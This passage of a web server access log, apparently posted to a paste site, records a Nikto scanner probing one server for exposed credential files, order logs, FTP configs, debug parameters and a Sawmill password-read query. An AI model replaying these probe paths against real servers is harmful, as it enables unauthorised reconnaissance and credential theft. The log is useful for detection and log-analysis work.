  1523. 84.56.69.222 - - [23/Oct/2013:15:44:48 +0400] "GET /webcgi/cgiwrap/~mysql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1524. 84.56.69.222 - - [23/Oct/2013:15:44:48 +0400] "GET /webcgi/cgiwrap/~noaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1525. 84.56.69.222 - - [23/Oct/2013:15:44:49 +0400] "GET /webcgi/cgiwrap/~nobody HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1526. 84.56.69.222 - - [23/Oct/2013:15:44:49 +0400] "GET /webcgi/cgiwrap/~nobody4 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1527. 84.56.69.222 - - [23/Oct/2013:15:45:00 +0400] "GET /webcgi/cgiwrap/~nuucp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1528. 84.56.69.222 - - [23/Oct/2013:15:45:00 +0400] "GET /webcgi/cgiwrap/~operator HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1529. 84.56.69.222 - - [23/Oct/2013:15:45:01 +0400] "GET /webcgi/cgiwrap/~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1530. 84.56.69.222 - - [23/Oct/2013:15:45:01 +0400] "GET /webcgi/cgiwrap/~smmsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1531. 84.56.69.222 - - [23/Oct/2013:15:45:01 +0400] "GET /webcgi/cgiwrap/~smtp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1532. 84.56.69.222 - - [23/Oct/2013:15:45:02 +0400] "GET /webcgi/cgiwrap/~sshd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1533. 84.56.69.222 - - [23/Oct/2013:15:45:02 +0400] "GET /webcgi/cgiwrap/~sys HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1534. 84.56.69.222 - - [23/Oct/2013:15:45:03 +0400] "GET /webcgi/cgiwrap/~test HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1535. 84.56.69.222 - - [23/Oct/2013:15:45:03 +0400] "GET /webcgi/cgiwrap/~unknown HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1536. 84.56.69.222 - - [23/Oct/2013:15:45:04 +0400] "GET /webcgi/cgiwrap/~uucp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1537. 84.56.69.222 - - [23/Oct/2013:15:45:04 +0400] "GET /webcgi/cgiwrap/~web HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1538. 84.56.69.222 - - [23/Oct/2013:15:45:04 +0400] "GET /webcgi/cgiwrap/~www HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1539. 84.56.69.222 - - [23/Oct/2013:15:45:05 +0400] "GET /scripts/cgiwrap/~adm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1540. 84.56.69.222 - - [23/Oct/2013:15:45:05 +0400] "GET /scripts/cgiwrap/~bin HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1541. 84.56.69.222 - - [23/Oct/2013:15:45:05 +0400] "GET /scripts/cgiwrap/~daemon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1542. 84.56.69.222 - - [23/Oct/2013:15:45:05 +0400] "GET /scripts/cgiwrap/~ftp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1543. 84.56.69.222 - - [23/Oct/2013:15:45:05 +0400] "GET /scripts/cgiwrap/~guest HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1544. 84.56.69.222 - - [23/Oct/2013:15:45:06 +0400] "GET /scripts/cgiwrap/~listen HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1545. 84.56.69.222 - - [23/Oct/2013:15:45:06 +0400] "GET /scripts/cgiwrap/~lp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1546. 84.56.69.222 - - [23/Oct/2013:15:45:06 +0400] "GET /scripts/cgiwrap/~mysql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1547. 84.56.69.222 - - [23/Oct/2013:15:45:06 +0400] "GET /scripts/cgiwrap/~noaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1548. 84.56.69.222 - - [23/Oct/2013:15:45:07 +0400] "GET /scripts/cgiwrap/~nobody HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1549. 84.56.69.222 - - [23/Oct/2013:15:45:18 +0400] "GET /scripts/cgiwrap/~nobody4 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1550. 84.56.69.222 - - [23/Oct/2013:15:45:18 +0400] "GET /scripts/cgiwrap/~nuucp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1551. 84.56.69.222 - - [23/Oct/2013:15:45:18 +0400] "GET /scripts/cgiwrap/~operator HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1552. 84.56.69.222 - - [23/Oct/2013:15:45:19 +0400] "GET /scripts/cgiwrap/~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1553. 84.56.69.222 - - [23/Oct/2013:15:45:19 +0400] "GET /scripts/cgiwrap/~smmsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1554. 84.56.69.222 - - [23/Oct/2013:15:45:19 +0400] "GET /scripts/cgiwrap/~smtp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1555. 84.56.69.222 - - [23/Oct/2013:15:45:46 +0400] "GET /scripts/cgiwrap/~sys HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1556. 84.56.69.222 - - [23/Oct/2013:15:45:47 +0400] "GET /scripts/cgiwrap/~test HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1557. 84.56.69.222 - - [23/Oct/2013:15:45:47 +0400] "GET /scripts/cgiwrap/~unknown HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1558. 84.56.69.222 - - [23/Oct/2013:15:45:47 +0400] "GET /scripts/cgiwrap/~uucp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1559. 84.56.69.222 - - [23/Oct/2013:15:45:47 +0400] "GET /scripts/cgiwrap/~web HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1560. 84.56.69.222 - - [23/Oct/2013:15:45:48 +0400] "GET /scripts/cgiwrap/~www HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1561. 84.56.69.222 - - [23/Oct/2013:15:45:48 +0400] "GET /webcgi/cgiwrap/~zctQq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000965)"
  1562. 84.56.69.222 - - [23/Oct/2013:15:45:56 +0400] "GET /scripts/cgiwrap/~zctQq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000965)"
  1563. 84.56.69.222 - - [23/Oct/2013:15:45:56 +0400] "GET /webcgi/cgiwrap/~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000966)"
  1564. 84.56.69.222 - - [23/Oct/2013:15:45:57 +0400] "GET /scripts/cgiwrap/~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000966)"
  1565. 84.56.69.222 - - [23/Oct/2013:15:45:57 +0400] "GET /webcgi/dbman/db.cgi?db=no-db HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000967)"
  1566. 84.56.69.222 - - [23/Oct/2013:15:45:57 +0400] "GET /scripts/dbman/db.cgi?db=no-db HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000967)"
  1567. 84.56.69.222 - - [23/Oct/2013:15:45:57 +0400] "GET /webcgi/dcshop/auth_data/auth_user_file.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000968)"
  1568. 84.56.69.222 - - [23/Oct/2013:15:45:57 +0400] "GET /scripts/dcshop/auth_data/auth_user_file.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000968)"
  1569. 84.56.69.222 - - [23/Oct/2013:15:45:58 +0400] "GET /webcgi/DCShop/auth_data/auth_user_file.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000969)"
  1570. 84.56.69.222 - - [23/Oct/2013:15:46:00 +0400] "GET /scripts/DCShop/auth_data/auth_user_file.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000969)"
  1571. 84.56.69.222 - - [23/Oct/2013:15:46:13 +0400] "GET /webcgi/dcshop/orders/orders.txt HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000970)"
  1572. 84.56.69.222 - - [23/Oct/2013:15:46:13 +0400] "GET /scripts/dcshop/orders/orders.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000970)"
  1573. 84.56.69.222 - - [23/Oct/2013:15:46:13 +0400] "GET /webcgi/DCShop/orders/orders.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000971)"
  1574. 84.56.69.222 - - [23/Oct/2013:15:46:14 +0400] "GET /scripts/DCShop/orders/orders.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000971)"
  1575. 84.56.69.222 - - [23/Oct/2013:15:46:22 +0400] "GET /webcgi/dumpenv.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000972)"
  1576. 84.56.69.222 - - [23/Oct/2013:15:46:24 +0400] "GET /scripts/dumpenv.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000972)"
  1577. 84.56.69.222 - - [23/Oct/2013:15:46:24 +0400] "GET /webcgi/htsearch?-c/nonexistant HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000973)"
  1578. 84.56.69.222 - - [23/Oct/2013:15:46:47 +0400] "GET /webcgi/mkilog.exe HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000974)"
  1579. 84.56.69.222 - - [23/Oct/2013:15:46:48 +0400] "GET /scripts/mkilog.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000974)"
  1580. 84.56.69.222 - - [23/Oct/2013:15:46:48 +0400] "GET /webcgi/mkplog.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000975)"
  1581. 84.56.69.222 - - [23/Oct/2013:15:46:48 +0400] "GET /scripts/mkplog.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000975)"
  1582. 84.56.69.222 - - [23/Oct/2013:15:46:48 +0400] "GET /webcgi/orders/orders.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000976)"
  1583. 84.56.69.222 - - [23/Oct/2013:15:46:48 +0400] "GET /scripts/orders/orders.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000976)"
  1584. 84.56.69.222 - - [23/Oct/2013:15:46:51 +0400] "GET /webcgi/processit.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000977)"
  1585. 84.56.69.222 - - [23/Oct/2013:15:46:51 +0400] "GET /scripts/processit.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000977)"
  1586. 84.56.69.222 - - [23/Oct/2013:15:46:51 +0400] "GET /webcgi/rpm_query HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000978)"
  1587. 84.56.69.222 - - [23/Oct/2013:15:46:51 +0400] "GET /scripts/rpm_query HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000978)"
  1588. 84.56.69.222 - - [23/Oct/2013:15:46:59 +0400] "GET /webcgi/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000979)"
  1589. 84.56.69.222 - - [23/Oct/2013:15:47:00 +0400] "GET /scripts/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000979)"
  1590. 84.56.69.222 - - [23/Oct/2013:15:47:00 +0400] "GET /webcgi/shop/auth_data/auth_user_file.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000980)"
  1591. 84.56.69.222 - - [23/Oct/2013:15:47:43 +0400] "GET /scripts/shop/orders/orders.txt HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000981)"
  1592. 84.56.69.222 - - [23/Oct/2013:15:47:44 +0400] "GET /webcgi/ws_ftp.ini HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000982)"
  1593. 84.56.69.222 - - [23/Oct/2013:15:47:44 +0400] "GET /scripts/ws_ftp.ini HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000982)"
  1594. 84.56.69.222 - - [23/Oct/2013:15:47:44 +0400] "GET /webcgi/WS_FTP.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000983)"
  1595. 84.56.69.222 - - [23/Oct/2013:15:48:06 +0400] "GET /?sql_debug=1 HTTP/1.1" 200 47738 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000984)"
  1596. 84.56.69.222 - - [23/Oct/2013:15:48:07 +0400] "GET /a_security.htm HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000985)"
  1597. 84.56.69.222 - - [23/Oct/2013:15:48:07 +0400] "GET /Admin_files/order.log HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000986)"
  1598. 84.56.69.222 - - [23/Oct/2013:15:48:07 +0400] "GET /admin.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000987)"
  1599. 84.56.69.222 - - [23/Oct/2013:15:48:08 +0400] "GET /admin/cplogfile.log HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000988)"
  1600. 84.56.69.222 - - [23/Oct/2013:15:48:08 +0400] "GET /admin/system_footer.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000989)"
  1601. 84.56.69.222 - - [23/Oct/2013:15:48:08 +0400] "GET /cfdocs/snippets/fileexists.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000990)"
  1602. 84.56.69.222 - - [23/Oct/2013:15:48:08 +0400] "GET /cgi-bin/MachineInfo HTTP/1.1" 404 279 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000991)"
  1603. 84.56.69.222 - - [23/Oct/2013:15:48:08 +0400] "GET /chat/!nicks.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000992)"
  1604. 84.56.69.222 - - [23/Oct/2013:15:48:08 +0400] "GET /chat/!pwds.txt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000993)"
  1605. 84.56.69.222 - - [23/Oct/2013:15:48:09 +0400] "GET /chat/data/usr HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000994)"
  1606. 84.56.69.222 - - [23/Oct/2013:15:48:09 +0400] "GET /com HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000995)"
  1607. 84.56.69.222 - - [23/Oct/2013:15:48:09 +0400] "GET /COM HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000996)"
  1608. 84.56.69.222 - - [23/Oct/2013:15:48:09 +0400] "GET /config.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000997)"
  1609. 84.56.69.222 - - [23/Oct/2013:15:48:09 +0400] "GET /config/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000998)"
  1610. 84.56.69.222 - - [23/Oct/2013:15:48:09 +0400] "GET /cplogfile.log HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000999)"
  1611. 84.56.69.222 - - [23/Oct/2013:15:48:10 +0400] "GET /cutenews/index.php?debug HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001000)"
  1612. 84.56.69.222 - - [23/Oct/2013:15:48:10 +0400] "GET /examples/jsp/snp/anything.snp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001001)"
  1613. 84.56.69.222 - - [23/Oct/2013:15:48:10 +0400] "GET /file-that-is-not-real-2002.php3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001002)"
  1614. 84.56.69.222 - - [23/Oct/2013:15:48:10 +0400] "GET /index.php?sql_debug=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001003)"
  1615. 84.56.69.222 - - [23/Oct/2013:15:48:11 +0400] "GET /webcgi/view-source?view-source HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001004)"
  1616. 84.56.69.222 - - [23/Oct/2013:15:48:11 +0400] "GET /scripts/view-source?view-source HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001004)"
  1617. 84.56.69.222 - - [23/Oct/2013:15:48:52 +0400] "GET /cfdocs/snippets/viewexample.cfm HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001006)"
  1618. 84.56.69.222 - - [23/Oct/2013:15:48:53 +0400] "GET /chassis/config/GeneralChassisConfig.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001007)"
  1619. 84.56.69.222 - - [23/Oct/2013:15:48:54 +0400] "GET /webcgi/ibill.pm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001008)"
  1620. 84.56.69.222 - - [23/Oct/2013:15:48:54 +0400] "GET /scripts/ibill.pm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001008)"
  1621. 84.56.69.222 - - [23/Oct/2013:15:48:54 +0400] "GET /webcgi/scoadminreg.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001009)"
  1622. 84.56.69.222 - - [23/Oct/2013:15:48:55 +0400] "GET /scripts/scoadminreg.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001009)"
  1623. 84.56.69.222 - - [23/Oct/2013:15:48:58 +0400] "GET /webcgi/SGB_DIR/superguestconfig HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:001010)"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement